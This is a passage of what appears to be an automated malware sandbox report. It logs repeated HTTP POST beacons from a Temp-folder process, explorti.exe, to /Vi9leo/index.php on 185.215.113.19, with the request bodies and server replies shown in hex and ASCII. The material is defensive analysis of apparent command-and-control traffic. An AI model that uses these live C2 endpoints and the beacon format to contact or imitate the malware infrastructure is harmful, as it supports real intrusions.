                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 20:57:21.100799084 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 20:57:21.102647066 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 20:57:21.106126070 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      15 | 192.168.2.4 | 49752 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:21.206692934 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:21.995510101 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:21.996994972 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:22.272706985 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      16 | 192.168.2.4 | 49753 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:22.395454884 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:23.145682096 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:23.146363020 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:23.392704010 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      17 | 192.168.2.4 | 49754 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:23.502688885 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:24.261826038 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:24.262581110 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:24.510602951 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      18 | 192.168.2.4 | 49755 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:24.625963926 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:25.383291960 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:25.384377956 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:25.643799067 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      19 | 192.168.2.4 | 49756 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:25.773972034 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:26.563147068 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:26.564135075 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:26.812366962 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      20 | 192.168.2.4 | 49757 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:27.133981943 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:27.894509077 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:27.895405054 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:28.145915985 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      21 | 192.168.2.4 | 49758 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:28.269089937 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:29.010404110 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:29.011056900 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:29.257996082 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      22 | 192.168.2.4 | 49759 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:29.375608921 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:30.133560896 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:30.136085033 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:30.398397923 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      23 | 192.168.2.4 | 49760 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:30.517441034 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:31.298367023 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:31.299105883 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:31.552133083 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      24 | 192.168.2.4 | 49761 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:31.672142982 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:32.427648067 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:32.428349972 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:32.685292006 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      25 | 192.168.2.4 | 49762 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:32.796787024 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:33.541835070 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:33.542690992 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:33.794807911 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      26 | 192.168.2.4 | 49763 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:33.907682896 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
